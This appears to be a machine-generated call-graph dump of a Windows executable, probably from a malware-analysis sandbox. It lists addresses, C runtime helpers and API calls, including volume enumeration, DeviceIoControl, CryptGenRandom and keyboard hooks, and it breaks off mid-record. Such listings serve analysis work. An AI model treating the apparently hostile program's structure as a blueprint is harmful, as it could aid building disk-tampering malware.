dfdf0c 10356->10359 10358 df5e4c _free 66 API calls 10357->10358 10357->10359 10358->10359 10359->10348 10361 dfeffa ___lock_fhandle 10360->10361 10362 dff01d 10361->10362 10363 dff002 10361->10363 10365 dff029 10362->10365 10368 dff063 10362->10368 10364 df7937 __lseeki64 66 API calls 10363->10364 10366 dff007 10364->10366 10367 df7937 __lseeki64 66 API calls 10365->10367 10369 df7924 __cftof2_l 66 API calls 10366->10369 10370 dff02e 10367->10370 10371 dfe676 ___lock_fhandle 68 API calls 10368->10371 10372 dff00f ___lock_fhandle 10369->10372 10373 df7924 __cftof2_l 66 API calls 10370->10373 10374 dff069 10371->10374 10372->10351 10375 dff036 10373->10375 10376 dff077 10374->10376 10377 dff083 10374->10377 10378 df78d2 __cftof2_l 11 API calls 10375->10378 10383 dfef52 10376->10383 10380 df7924 __cftof2_l 66 API calls 10377->10380 10378->10372 10381 dff07d 10380->10381 10398 dff0aa 10381->10398 10384 dfe60d __close_nolock 66 API calls 10383->10384 10387 dfef62 10384->10387 10385 dfefb8 10401 dfe587 10385->10401 10387->10385 10388 dfef96 10387->10388 10391 dfe60d __close_nolock 66 API calls 10387->10391 10388->10385 10389 dfe60d __close_nolock 66 API calls 10388->10389 10393 dfefa2 CloseHandle 10389->10393 10392 dfef8d 10391->10392 10395 dfe60d __close_nolock 66 API calls 10392->10395 10393->10385 10396 dfefae GetLastError 10393->10396 10394 dfefe2 10394->10381 10395->10388 10396->10385 10397 df794a __dosmaperr 66 API calls 10397->10394 10410 dfe715 RtlLeaveCriticalSection 10398->10410 10400 dff0b0 10400->10372 10402 dfe598 10401->10402 10403 dfe5f3 10401->10403 10402->10403 10407 dfe5c3 10402->10407 10404 df7924 __cftof2_l 66 API calls 10403->10404 10405 dfe5f8 10404->10405 10406 df7937 __lseeki64 66 API calls 10405->10406 10408 dfe5e9 10406->10408 10407->10408 10409 dfe5e3 SetStdHandle 10407->10409 10408->10394 10408->10397 10409->10408 10410->10400 10412 df69df RtlLeaveCriticalSection 10411->10412 10413 df69c0 10411->10413 10412->10355 10413->10412 10414 df69c7 10413->10414 10417 df93dd RtlLeaveCriticalSection 10414->10417 10416 df69dc 10416->10355 10417->10416 10418->10330 9873 dfc4d9 9874 dfc4dc 9873->9874 9877 dfe73c 9874->9877 9886 dfc554 RtlDecodePointer 9877->9886 9879 dfe74c 9882 dfe764 9879->9882 9883 df7757 __call_reportfault 8 API calls 9879->9883 9880 dfe741 9880->9879 9887 dfc561 9880->9887 9884 df7f7a __amsg_exit 66 API calls 9882->9884 9883->9882 9885 dfe76e 9884->9885 9886->9880 9890 dfc56d ___lock_fhandle 9887->9890 9888 dfc5c8 9889 dfc5aa RtlDecodePointer 9888->9889 9894 dfc5d7 9888->9894 9896 dfc599 _siglookup 9889->9896 9890->9888 9890->9889 9891 dfc594 9890->9891 9895 dfc590 9890->9895 9892 dfa03d __getptd_noexit 66 API calls 9891->9892 9892->9896 9897 df7924 __cftof2_l 66 API calls 9894->9897 9895->9891 9895->9894 9898 dfc634 9896->9898 9899 dfc5a2 ___lock_fhandle 9896->9899 9901 df7f7a __amsg_exit 66 API calls 9896->9901 9900 dfc5dc 9897->9900 9903 df94b6 __lock 66 API calls 9898->9903 9904 dfc63f 9898->9904 9899->9879 9902 df78d2 __cftof2_l 11 API calls 9900->9902 9901->9898 9902->9899 9903->9904 9906 dfc674 9904->9906 9908 df9f06 RtlEncodePointer 9904->9908 9909 dfc6c8 9906->9909 9908->9906 9910 dfc6ce 9909->9910 9912 dfc6d5 9909->9912 9913 df93dd RtlLeaveCriticalSection 9910->9913 9912->9899 9913->9912 9981 dfa0d0 9982 dfa0dc ___lock_fhandle 9981->9982 9983 dfa0f4 9982->9983 9985 dfa1de ___lock_fhandle 9982->9985 9986 df5e4c _free 66 API calls 9982->9986 9984 dfa102 9983->9984 9987 df5e4c _free 66 API calls 9983->9987 9988 dfa110 9984->9988 9989 df5e4c _free 66 API calls 9984->9989 9986->9983 9987->9984 9990 df5e4c _free 66 API calls 9988->9990 9992 dfa11e 9988->9992 9989->9988 9990->9992 9991 dfa12c 9993 dfa13a 9991->9993 9995 df5e4c _free 66 API calls 9991->9995 9992->9991 9994 df5e4c _free 66 API calls 9992->9994 9996 dfa148 9993->9996 9997 df5e4c _free 66 API calls 9993->9997 9994->9991 9995->9993 9998 dfa159 9996->9998 9999 df5e4c _free 66 API calls 9996->9999 9997->9996 10000 df94b6 __lock 66 API calls 9998->10000 9999->9998 10001 dfa161 10000->10001 10002 dfa16d InterlockedDecrement 10001->10002 10003 dfa186 10001->10003 10002->10003 10004 dfa178 10002->10004 10017 dfa1ea 10003->10017 10004->10003 10007 df5e4c _free 66 API calls 10004->10007 10007->10003 10008 df94b6 __lock 66 API calls 10009 dfa19a 10008->10009 10010 dfa1cb 10009->10010 10012 df9c5c ___removelocaleref 8 API calls 10009->10012 10020 dfa1f6 10010->10020 10015 dfa1af 10012->10015 10014 df5e4c _free 66 API calls 10014->9985 10015->10010 10016 df9cf5 ___freetlocinfo 66 API calls 10015->10016 10016->10010 10023 df93dd RtlLeaveCriticalSection 10017->10023 10019 dfa193 10019->10008 10024 df93dd RtlLeaveCriticalSection 10020->10024 10022 dfa1d8 10022->10014 10023->10019 10024->10022 10552 df43b7 10553 df43c0 10552->10553 10554 df3d00 5 API calls 10553->10554 10555 df43f0 CryptReleaseContext 10553->10555 10554->10553 10557 df4415 10555->10557 10558 df4070 40 API calls 10557->10558 10559 df441a 10558->10559 10560 df5c9f __ld12tod 5 API calls 10559->10560 10561 df4428 10560->10561 8107 df65f4 8108 df6600 ___lock_fhandle 8107->8108 8109 df660a HeapSetInformation 8108->8109 8111 df6615 8108->8111 8109->8111 8144 df7cc3 HeapCreate 8111->8144 8112 df6663 8113 df666e 8112->8113 8248 df65cb 8112->8248 8145 dfa1ff GetModuleHandleW 8113->8145 8116 df6674 8117 df667f __RTC_Initialize 8116->8117 8118 df65cb _fast_error_exit 66 API calls 8116->8118 8170 dfadf6 GetStartupInfoW 8117->8170 8118->8117 8121 df6699 GetCommandLineW 8183 dfad9e GetEnvironmentStringsW 8121->8183 8125 df66a9 8190 dfacf0 GetModuleFileNameW 8125->8190 8128 df66be 8196 dfaabe 8128->8196 8129 df7fae __amsg_exit 66 API calls 8129->8128 8131 df66c4 8132 df66cf 8131->8132 8133 df7fae __amsg_exit 66 API calls 8131->8133 8210 df7d8d 8132->8210 8133->8132 8135 df66d7 8136 df66e2 8135->8136 8137 df7fae __amsg_exit 66 API calls 8135->8137 8216 df5660 8136->8216 8137->8136 8140 df6710 8263 df7f90 8140->8263 8143 df6715 ___lock_fhandle 8144->8112 8146 dfa21c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8145->8146 8147 dfa213 8145->8147 8149 dfa266 TlsAlloc 8146->8149 8266 df9f4c 8147->8266 8152 dfa375 8149->8152 8153 dfa2b4 TlsSetValue 8149->8153 8152->8116 8153->8152 8154 dfa2c5 8153->8154 8271 df7d36 8154->8271 8159 dfa30d RtlDecodePointer 8162 dfa322 8159->8162 8160 dfa370 8161 df9f4c __mtterm 2 API calls 8160->8161 8161->8152 8162->8160 8280 dfb16f 8162->8280 8165 dfa340 RtlDecodePointer 8166 dfa351 8165->8166 8166->8160 8167 dfa355 8166->8167 8286 df9f89 8167->8286 8169 dfa35d GetCurrentThreadId 8169->8152 8171 dfb16f __calloc_crt 66 API calls 8170->8171 8180 dfae14 8171->8180 8172 dfafbf GetStdHandle 8177 dfaf89 8172->8177 8173 dfb16f __calloc_crt 66 API calls 8173->8180 8174 dfb023 SetHandleCount 8182 df668d 8174->8182 8175 dfafd1 GetFileType 8175->8177 8176 dfaf09 8176->8177 8178 dfaf35 GetFileType 8176->8178 8179 dfaf40 InitializeCriticalSectionAndSpinCount 8176->8179 8177->8172 8177->8174 8177->8175 8181 dfaff7 InitializeCriticalSectionAndSpinCount 8177->8181 8178->8176 8178->8179 8179->8176 8179->8182 8180->8173 8180->8176 8180->8177 8180->8182 8181->8177 8181->8182 8182->8121 8256 df7fae 8182->8256 8184 dfadaf 8183->8184 8185 dfadb3 8183->8185 8184->8125 8187 dfb12a __malloc_crt 66 API calls 8185->8187 8188 dfadd5 _memmove 8187->8188 8189 dfaddc FreeEnvironmentStringsW 8188->8189 8189->8125 8191 dfad25 _wparse_cmdline 8190->8191 8192 df66b3 8191->8192 8193 dfad62 8191->8193 8192->8128 8192->8129 8194 dfb12a __malloc_crt 66 API calls 8193->8194 8195 dfad68 _wparse_cmdline 8194->8195 8195->8192 8197 dfaad6 _wcslen 8196->8197 8201 dfaace 8196->8201 8198 dfb16f __calloc_crt 66 API calls 8197->8198 8204 dfaafa _wcslen 8198->8204 8199 dfab50 8200 df5e4c _free 66 API calls 8199->8200 8200->8201 8201->8131 8202 dfb16f __calloc_crt 66 API calls 8202->8204 8203 dfab76 8205 df5e4c _free 66 API calls 8203->8205 8204->8199 8204->8201 8204->8202 8204->8203 8206 dfa809 __NMSG_WRITE 66 API calls 8204->8206 8207 dfab8d 8204->8207 8205->8201 8206->8204 8208 df7880 __invoke_watson 10 API calls 8207->8208 8209 dfab99 8208->8209 8209->8131 8212 df7d9b __IsNonwritableInCurrentImage 8210->8212 8527 dfb68d 8212->8527 8213 df7db9 __initterm_e 8215 df7dda __IsNonwritableInCurrentImage 8213->8215 8530 dfc845 8213->8530 8215->8135 8595 df52d0 GetFileAttributesW 8216->8595 8223 df576a 8225 df578a 8223->8225 8231 df5796 8223->8231 8723 df5510 8223->8723 8619 df4550 8225->8619 8229 df5c9f __ld12tod 5 API calls 8232 df57ac 8229->8232 8230 df56b4 8230->8231 8233 df56ff CreateEventW SetConsoleCtrlHandler 8230->8233 8656 df5150 8231->8656 8232->8140 8245 df7f64 8232->8245 8671 df5b90 8233->8671 8241 df5742 WaitForSingleObject 8242 df575d Sleep 8241->8242 8243 df5758 8241->8243 8242->8231 8716 df5bf0 GetSystemDirectoryW 8243->8716 9828 df7e24 8245->9828 8247 df7f75 8247->8140 8249 df65de 8248->8249 8250 df65d9 8248->8250 8252 df7ff4 __NMSG_WRITE 66 API calls 8249->8252 8251 df81a3 __FF_MSGBANNER 66 API calls 8250->8251 8251->8249 8253 df65e6 8252->8253 8254 df7d0c _doexit 3 API calls 8253->8254 8255 df65f0 8254->8255 8255->8113 8257 df81a3 __FF_MSGBANNER 66 API calls 8256->8257 8258 df7fb8 8257->8258 8259 df7ff4 __NMSG_WRITE 66 API calls 8258->8259 8260 df7fc0 8259->8260 9858 df7f7a 8260->9858 8264 df7e24 _doexit 66 API calls 8263->8264 8265 df7f9b 8264->8265 8265->8143 8267 df9f65 8266->8267 8268 df9f56 RtlDecodePointer 8266->8268 8269 df9f76 TlsFree 8267->8269 8270 df9f84 8267->8270 8268->8267 8269->8270 8270->8270 8299 df9f06 RtlEncodePointer 8271->8299 8273 df7d3e __init_pointers __initp_misc_winsig 8300 dfc4ee RtlEncodePointer 8273->8300 8275 df7d64 RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 8276 df933c 8275->8276 8277 df9347 8276->8277 8278 df9351 InitializeCriticalSectionAndSpinCount 8277->8278 8279 df9374 8277->8279 8278->8277 8278->8279 8279->8159 8279->8160 8282 dfb178 8280->8282 8283 dfa338 8282->8283 8284 dfb196 Sleep 8282->8284 8301 dfdd36 8282->8301 8283->8160 8283->8165 8285 dfb1ab 8284->8285 8285->8282 8285->8283 8338 df7970 8286->8338 8288 df9f95 GetModuleHandleW 8339 df94b6 8288->8339 8290 df9fd3 InterlockedIncrement 8346 dfa02b 8290->8346 8293 df94b6 __lock 64 API calls 8294 df9ff4 8293->8294 8349 df9bcd InterlockedIncrement 8294->8349 8296 dfa012 8361 dfa034 8296->8361 8298 dfa01f ___lock_fhandle 8298->8169 8299->8273 8300->8275 8302 dfdd42 8301->8302 8308 dfdd5d 8301->8308 8303 dfdd4e 8302->8303 8302->8308 8310 df7924 8303->8310 8305 dfdd70 HeapAlloc 8307 dfdd97 8305->8307 8305->8308 8307->8282 8308->8305 8308->8307 8313 df81eb RtlDecodePointer 8308->8313 8315 dfa03d GetLastError 8310->8315 8312 df7929 8312->8282 8314 df8200 8313->8314 8314->8308 8329 df9f18 TlsGetValue 8315->8329 8318 dfa0aa SetLastError 8318->8312 8319 dfb16f __calloc_crt 62 API calls 8320 dfa068 8319->8320 8320->8318 8321 dfa070 RtlDecodePointer 8320->8321 8322 dfa085 8321->8322 8323 dfa089 8322->8323 8324 dfa0a1 8322->8324 8325 df9f89 __initptd 62 API calls 8323->8325 8332 df5e4c 8324->8332 8328 dfa091 GetCurrentThreadId 8325->8328 8327 dfa0a7 8327->8318 8328->8318 8330 df9f2d RtlDecodePointer TlsSetValue 8329->8330 8331 df9f48 8329->8331 8330->8331 8331->8318 8331->8319 8333 df5e57 HeapFree 8332->8333 8334 df5e80 __dosmaperr 8332->8334 8333->8334 8335 df5e6c 8333->8335 8334->8327 8336 df7924 __cftof2_l 64 API calls 8335->8336 8337 df5e72 GetLastError 8336->8337 8337->8334 8338->8288 8340 df94de RtlEnterCriticalSection 8339->8340 8341 df94cb 8339->8341 8340->8290 8364 df93f4 8341->8364 8343 df94d1 8343->8340 8344 df7fae __amsg_exit 65 API calls 8343->8344 8345 df94dd 8344->8345 8345->8340 8525 df93dd RtlLeaveCriticalSection 8346->8525 8348 df9fed 8348->8293 8350 df9bee 8349->8350 8351 df9beb InterlockedIncrement 8349->8351 8352 df9bfb 8350->8352 8353 df9bf8 InterlockedIncrement 8350->8353 8351->8350 8354 df9c08 8352->8354 8355 df9c05 InterlockedIncrement 8352->8355 8353->8352 8356 df9c12 InterlockedIncrement 8354->8356 8357 df9c15 8354->8357 8355->8354 8356->8357 8358 df9c2e InterlockedIncrement 8357->8358 8359 df9c3e InterlockedIncrement 8357->8359 8360 df9c49 InterlockedIncrement 8357->8360 8358->8357 8359->8357 8360->8296 8526 df93dd RtlLeaveCriticalSection 8361->8526 8363 dfa03b 8363->8298 8366 df9400 ___lock_fhandle 8364->8366 8365 df9426 8372 df9436 ___lock_fhandle 8365->8372 8425 dfb12a 8365->8425 8366->8365 8389 df81a3 8366->8389 8372->8343 8374 df9448 8377 df7924 __cftof2_l 65 API calls 8374->8377 8375 df9457 8378 df94b6 __lock 65 API calls 8375->8378 8377->8372 8379 df945e 8378->8379 8380 df9466 InitializeCriticalSectionAndSpinCount 8379->8380 8381 df9491 8379->8381 8382 df9482 8380->8382 8383 df9476 8380->8383 8384 df5e4c _free 65 API calls 8381->8384 8430 df94ad 8382->8430 8385 df5e4c _free 65 API calls 8383->8385 8384->8382 8386 df947c 8385->8386 8388 df7924 __cftof2_l 65 API calls 8386->8388 8388->8382 8433 dfcb25 8389->8433 8391 df81aa 8392 dfcb25 __NMSG_WRITE 66 API calls 8391->8392 8394 df81b7 8391->8394 8392->8394 8393 df7ff4 __NMSG_WRITE 66 API calls 8395 df81cf 8393->8395 8394->8393 8397 df81d9 8394->8397 8396 df7ff4 __NMSG_WRITE 66 API calls 8395->8396 8396->8397 8398 df7ff4 8397->8398 8399 df8015 __NMSG_WRITE 8398->8399 8401 dfcb25 __NMSG_WRITE 63 API calls 8399->8401 8421 df8131 8399->8421 8403 df802f 8401->8403 8402 df81a1 8422 df7d0c 8402->8422 8404 df8140 GetStdHandle 8403->8404 8405 dfcb25 __NMSG_WRITE 63 API calls 8403->8405 8408 df814e _strlen 8404->8408 8404->8421 8406 df8040 8405->8406 8406->8404 8407 df8052 8406->8407 8407->8421 8458 dfa809 8407->8458 8411 df8184 WriteFile 8408->8411 8408->8421 8411->8421 8412 df807e GetModuleFileNameW 8413 df809f 8412->8413 8417 df80ab _wcslen 8412->8417 8414 dfa809 __NMSG_WRITE 63 API calls 8413->8414 8414->8417 8415 df7880 __invoke_watson 10 API calls 8415->8417 8416 dfc9c8 63 API calls __NMSG_WRITE 8416->8417 8417->8415 8417->8416 8419 df8121 8417->8419 8467 dfca3d 8417->8467 8476 dfc85c 8419->8476 8494 df5c9f 8421->8494 8504 df7ce1 GetModuleHandleW 8422->8504 8428 dfb133 8425->8428 8427 df9441 8427->8374 8427->8375 8428->8427 8429 dfb14a Sleep 8428->8429 8508 df5e86 8428->8508 8429->8428 8524 df93dd RtlLeaveCriticalSection 8430->8524 8432 df94b4 8432->8372 8434 dfcb31 8433->8434 8435 dfcb3b 8434->8435 8436 df7924 __cftof2_l 66 API calls 8434->8436 8435->8391 8437 dfcb54 8436->8437 8440 df78d2 8437->8440 8443 df78a5 RtlDecodePointer 8440->8443 8444 df78ba 8443->8444 8449 df7880 8444->8449 8446 df78d1 8447 df78a5 __cftof2_l 10 API calls 8446->8447 8448 df78de 8447->8448 8448->8391 8452 df7757 8449->8452 8453 df7776 _memset __call_reportfault 8452->8453 8454 df7794 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8453->8454 8455 df7862 __call_reportfault 8454->8455 8456 df5c9f __ld12tod 5 API calls 8455->8456 8457 df787e GetCurrentProcess TerminateProcess 8456->8457 8457->8446 8459 dfa81e 8458->8459 8460 dfa817 8458->8460 8461 df7924 __cftof2_l 66 API calls 8459->8461 8460->8459 8465 dfa83f 8460->8465 8462 dfa823 8461->8462 8463 df78d2 __cftof2_l 11 API calls 8462->8463 8464 df8073 8463->8464 8464->8412 8464->8417 8465->8464 8466 df7924 __cftof2_l 66 API calls 8465->8466 8466->8462 8471 dfca4f 8467->8471 8468 dfca53 8469 dfca58 8468->8469 8470 df7924 __cftof2_l 66 API calls 8468->8470 8469->8417 8475 dfca6f 8470->8475 8471->8468 8471->8469 8473 dfca96 8471->8473 8472 df78d2 __cftof2_l 11 API calls 8472->8469 8473->8469 8474 df7924 __cftof2_l 66 API calls 8473->8474 8474->8475 8475->8472 8502 df9f06 RtlEncodePointer 8476->8502 8478 dfc882 8479 dfc892 LoadLibraryW 8478->8479 8481 dfc90f 8478->8481 8480 dfc8a7 GetProcAddress 8479->8480 8482 dfc9a7 8479->8482 8480->8482 8485 dfc8bd 7 API calls 8480->8485 8486 dfc929 RtlDecodePointer RtlDecodePointer 8481->8486 8491 dfc93c 8481->8491 8487 df5c9f __ld12tod 5 API calls 8482->8487 8483 dfc99b RtlDecodePointer 8483->8482 8484 dfc972 RtlDecodePointer 8484->8483 8488 dfc979 8484->8488 8485->8481 8489 dfc8ff GetProcAddress RtlEncodePointer 8485->8489 8486->8491 8490 dfc9c6 8487->8490 8488->8483 8492 dfc98c RtlDecodePointer 8488->8492 8489->8481 8490->8421 8491->8483 8491->8484 8493 dfc95f 8491->8493 8492->8483 8492->8493 8493->8483 8495 df5ca9 IsDebuggerPresent 8494->8495 8496 df5ca7 8494->8496 8503 dfb122 8495->8503 8496->8402 8499 df682c SetUnhandledExceptionFilter UnhandledExceptionFilter 8500 df6849 __call_reportfault 8499->8500 8501 df6851 GetCurrentProcess TerminateProcess 8499->8501 8500->8501 8501->8402 8502->8478 8503->8499 8505 df7d0a ExitProcess 8504->8505 8506 df7cf5 GetProcAddress 8504->8506 8506->8505 8507 df7d05 8506->8507 8507->8505 8509 df5f03 8508->8509 8516 df5e94 8508->8516 8510 df81eb _malloc RtlDecodePointer 8509->8510 8511 df5f09 8510->8511 8512 df7924 __cftof2_l 65 API calls 8511->8512 8515 df5efb 8512->8515 8513 df81a3 __FF_MSGBANNER 65 API calls 8513->8516 8514 df5ec2 HeapAlloc 8514->8515 8514->8516 8515->8428 8516->8513 8516->8514 8517 df7ff4 __NMSG_WRITE 65 API calls 8516->8517 8518 df5eef 8516->8518 8519 df81eb _malloc RtlDecodePointer 8516->8519 8521 df7d0c _doexit 3 API calls 8516->8521 8522 df5eed 8516->8522 8517->8516 8520 df7924 __cftof2_l 65 API calls 8518->8520 8519->8516 8520->8522 8521->8516 8523 df7924 __cftof2_l 65 API calls 8522->8523 8523->8515 8524->8432 8525->8348 8526->8363 8528 dfb693 RtlEncodePointer 8527->8528 8528->8528 8529 dfb6ad 8528->8529 8529->8213 8533 dfc809 8530->8533 8532 dfc852 8532->8215 8534 dfc815 ___lock_fhandle 8533->8534 8541 df7d24 8534->8541 8540 dfc836 ___lock_fhandle 8540->8532 8542 df94b6 __lock 66 API calls 8541->8542 8543 df7d2b 8542->8543 8544 dfc722 RtlDecodePointer RtlDecodePointer 8543->8544 8545 dfc7d1 8544->8545 8546 dfc750 8544->8546 8555 dfc83f 8545->8555 8546->8545 8558 dfe76f 8546->8558 8548 dfc7b4 RtlEncodePointer RtlEncodePointer 8548->8545 8549 dfc762 8549->8548 8551 dfc786 8549->8551 8565 dfb1bb 8549->8565 8551->8545 8552 dfb1bb __realloc_crt 70 API calls 8551->8552 8553 dfc7a2 RtlEncodePointer 8551->8553 8554 dfc79c 8552->8554 8553->8548 8554->8545 8554->8553 8591 df7d2d 8555->8591 8559 dfe78f RtlSizeHeap 8558->8559 8560 dfe77a 8558->8560 8559->8549 8561 df7924 __cftof2_l 66 API calls 8560->8561 8562 dfe77f 8561->8562 8563 df78d2 __cftof2_l 11 API calls 8562->8563 8564 dfe78a 8563->8564 8564->8549 8567 dfb1c4 8565->8567 8568 dfb203 8567->8568 8569 dfb1e4 Sleep 8567->8569 8570 dfddb8 8567->8570 8568->8551 8569->8567 8571 dfddce 8570->8571 8572 dfddc3 8570->8572 8573 dfddd6 8571->8573 8583 dfdde3 8571->8583 8574 df5e86 _malloc 66 API calls 8572->8574 8576 df5e4c _free 66 API calls 8573->8576 8575 dfddcb 8574->8575 8575->8567 8590 dfddde __dosmaperr 8576->8590 8577 dfde1b 8579 df81eb _malloc RtlDecodePointer 8577->8579 8578 dfddeb RtlReAllocateHeap 8578->8583 8578->8590 8580 dfde21 8579->8580 8581 df7924 __cftof2_l 66 API calls 8580->8581 8581->8590 8582 dfde4b 8585 df7924 __cftof2_l 66 API calls 8582->8585 8583->8577 8583->8578 8583->8582 8584 df81eb _malloc RtlDecodePointer 8583->8584 8587 dfde33 8583->8587 8584->8583 8586 dfde50 GetLastError 8585->8586 8586->8590 8588 df7924 __cftof2_l 66 API calls 8587->8588 8589 dfde38 GetLastError 8588->8589 8589->8590 8590->8567 8594 df93dd RtlLeaveCriticalSection 8591->8594 8593 df7d34 8593->8540 8594->8593 8596 df52ea CreateFileW 8595->8596 8603 df5339 8595->8603 8598 df5308 CloseHandle CreateFileW 8596->8598 8596->8603 8599 df5327 TlsSetValue 8598->8599 8598->8603 8749 df47e0 FindFirstVolumeW 8599->8749 8600 df5340 8786 df21f0 8600->8786 8765 df42a0 VirtualAlloc 8603->8765 8604 df5358 8605 df57b0 8604->8605 8606 df57b9 8605->8606 8608 df569d 8606->8608 9193 df65ae 8606->9193 8609 df5810 8608->8609 8610 df57b0 102 API calls 8609->8610 8611 df583d GetEnvironmentVariableW 8610->8611 8612 df5864 GetSystemDirectoryW 8611->8612 8613 df5890 CreateProcessW 8611->8613 8614 df587a lstrcatW 8612->8614 8615 df58f4 8612->8615 8613->8615 8614->8613 8614->8615 8616 df5c9f __ld12tod 5 API calls 8615->8616 8617 df56a5 8616->8617 8617->8223 8617->8230 9213 df5cae 8619->9213 8621 df4570 9230 df61c0 8621->9230 8623 df4578 GetLogicalDrives 8624 df4595 8623->8624 8625 df4631 8624->8625 8626 df45a6 _memset 8624->8626 8629 df5cae _wprintf 104 API calls 8625->8629 8626->8624 8627 df45d5 GetDriveTypeW 8626->8627 8635 df4633 8626->8635 9250 df4490 CreateFileW 8626->9250 8627->8624 8628 df45e6 PathAppendW 8627->8628 8628->8624 8628->8626 8630 df4685 8629->8630 9238 df5f97 8630->9238 8635->8625 8639 df5cae _wprintf 104 API calls 8635->8639 8637 df47bd 8638 df5cae _wprintf 104 API calls 8637->8638 8640 df47c7 8638->8640 8642 df4678 8639->8642 8643 df61c0 71 API calls 8640->8643 8641 df5cae _wprintf 104 API calls 8644 df46e2 8641->8644 8642->8625 8645 df47cf 8643->8645 8644->8641 8646 df61c0 71 API calls 8644->8646 8647 df5c9f __ld12tod 5 API calls 8645->8647 8648 df4704 GetStdHandle GetConsoleScreenBufferInfo FillConsoleOutputCharacterW SetConsoleCursorPosition 8646->8648 8649 df47dc 8647->8649 8651 df474d 8648->8651 8649->8231 8650 df5cae 104 API calls _wprintf 8650->8651 8651->8650 8652 df5f97 _wscanf 68 API calls 8651->8652 8653 df478c CreateEventW 8652->8653 8654 df1f30 11 API calls 8653->8654 8655 df47a9 WaitForSingleObject 8654->8655 8655->8637 8655->8644 8657 df52b4 8656->8657 8658 df5170 CoInitialize 8656->8658 8659 df5c9f __ld12tod 5 API calls 8657->8659 8658->8657 8660 df518a CoCreateInstance 8658->8660 8661 df52be 8659->8661 8662 df52ae CoUninitialize 8660->8662 8663 df51ad GetModuleFileNameW 8660->8663 8661->8229 8662->8657 8664 df51d6 8663->8664 8665 df520a GetVersion 8664->8665 8670 df529e 8664->8670 8666 df5219 ExpandEnvironmentStringsW 8665->8666 8668 df5244 8666->8668 8668->8668 8669 df5285 Sleep 8668->8669 8669->8670 8670->8662 8672 df57b0 102 API calls 8671->8672 8673 df5bbe 8672->8673 8674 df5810 106 API calls 8673->8674 8675 df5bc6 CreateThread 8674->8675 8676 df5c9f __ld12tod 5 API calls 8675->8676 9324 df5a50 8675->9324 8677 df5721 8676->8677 8678 df6285 8677->8678 9356 dfa621 8678->9356 8681 df5370 VirtualAlloc 8682 df53af 8681->8682 8689 df54f2 8681->8689 8683 df2020 5 API calls 8682->8683 8686 df53c6 8683->8686 8684 df5c9f __ld12tod 5 API calls 8685 df5502 8684->8685 8709 df2020 TlsGetValue 8685->8709 8687 df53df 8686->8687 8688 df53cd VirtualLock 8686->8688 8687->8689 9377 df12a0 CryptAcquireContextW 8687->9377 8688->8687 8689->8684 8692 df5422 8692->8692 9381 df15a0 CryptAcquireContextW 8692->9381 8695 df54ec 8698 df3820 8 API calls 8695->8698 8696 df5456 WideCharToMultiByte 9391 df5050 8696->9391 8698->8689 8700 df54df LocalFree 8700->8695 8702 df5488 8702->8700 8708 df54a1 8702->8708 9410 df2340 VirtualAlloc 8702->9410 8705 df54bf 9423 df3820 TlsGetValue 8705->9423 8706 df54dc 8706->8700 8708->8700 9433 df4c90 8708->9433 8710 df2068 DeviceIoControl 8709->8710 8711 df2037 CreateFileW 8709->8711 8712 df208d GetLastError 8710->8712 8713 df2098 8710->8713 8714 df205a TlsSetValue 8711->8714 8715 df2050 8711->8715 8712->8241 8713->8241 8714->8710 8715->8241 8717 df5c19 PathAppendW 8716->8717 8718 df5c8e 8716->8718 8717->8718 8719 df5c82 8717->8719 8720 df5c9f __ld12tod 5 API calls 8718->8720 8721 df5810 106 API calls 8719->8721 8722 df5c9b 8720->8722 8721->8718 8722->8242 8724 df553d 8723->8724 8748 df5607 8723->8748 8726 df5564 8724->8726 8728 df5552 8724->8728 8725 df5c9f __ld12tod 5 API calls 8727 df561c 8725->8727 8730 df5581 8726->8730 8735 df55a2 8726->8735 8726->8748 8727->8225 8729 df5c9f __ld12tod 5 API calls 8728->8729 8732 df5560 8729->8732 9722 df4e00 GetStdHandle GetConsoleScreenBufferInfo FillConsoleOutputCharacterW SetConsoleCursorPosition 8730->9722 8732->8225 8734 df3540 123 API calls 8736 df558d 8734->8736 8737 df2020 5 API calls 8735->8737 8742 df55c6 8735->8742 8735->8748 8739 df5c9f __ld12tod 5 API calls 8736->8739 8737->8742 8740 df559e 8739->8740 8740->8225 8743 df3820 8 API calls 8742->8743 8744 df55fb 8742->8744 8742->8748 9738 df50b0 VirtualAlloc 8742->9738 9756 df2470 VirtualAlloc 8742->9756 8743->8742 8745 df4e00 114 API calls 8744->8745 8746 df5602 8745->8746 8747 df3540 123 API calls 8746->8747 8747->8748 8748->8725 8750 df48d8 8749->8750 8751 df4817 8749->8751 8753 df5c9f __ld12tod 5 API calls 8750->8753 8796 df20a0 TlsGetValue 8751->8796 8755 df48e5 8753->8755 8754 df4828 8758 df4834 8754->8758 8808 df22b0 FindNextVolumeW GetLastError 8754->8808 8755->8603 8757 df4850 FindNextVolumeW GetLastError 8757->8758 8759 df48cb FindVolumeClose 8757->8759 8758->8750 8758->8757 8760 df20a0 105 API calls 8758->8760 8761 df22b0 108 API calls 8758->8761 8762 df48ba 8758->8762 8759->8750 8760->8758 8761->8758 8763 df5c9f __ld12tod 5 API calls 8762->8763 8764 df48c7 8763->8764 8764->8603 8766 df42dd 8765->8766 8767 df430d 8765->8767 8768 df2020 5 API calls 8766->8768 8769 df431c 8767->8769 8770 df4331 GetCurrentThreadId SetWindowsHookExW GetCurrentThreadId SetWindowsHookExW CryptAcquireContextW 8767->8770 8774 df42f4 8768->8774 8771 df5c9f __ld12tod 5 API calls 8769->8771 8772 df437e CryptAcquireContextW 8770->8772 8773 df4395 CryptGenRandom 8770->8773 8775 df432d 8771->8775 8772->8773 8776 df4415 8772->8776 8782 df43c0 8773->8782 8774->8767 8777 df42fb VirtualLock 8774->8777 8775->8600 9178 df4070 29 API calls 8776->9178 8777->8767 8781 df5c9f __ld12tod 5 API calls 8784 df4428 8781->8784 8783 df43f0 8782->8783 9187 df3d00 TlsGetValue 8782->9187 8783->8783 8785 df4407 CryptReleaseContext 8783->8785 8784->8600 8785->8776 8787 df2210 8786->8787 8787->8787 8788 df2227 TlsGetValue DeviceIoControl 8787->8788 8789 df228f 8788->8789 8790 df2260 8788->8790 8791 df5c9f __ld12tod 5 API calls 8789->8791 8790->8789 8792 df2267 8790->8792 8793 df229f 8791->8793 8792->8792 8794 df5c9f __ld12tod 5 API calls 8792->8794 8793->8604 8795 df228b 8794->8795 8795->8604 8797 df20cd _wcschr 8796->8797 8823 df5d7c 8797->8823 8800 df2147 8801 df21d5 8800->8801 8804 df216f DeviceIoControl 8800->8804 8802 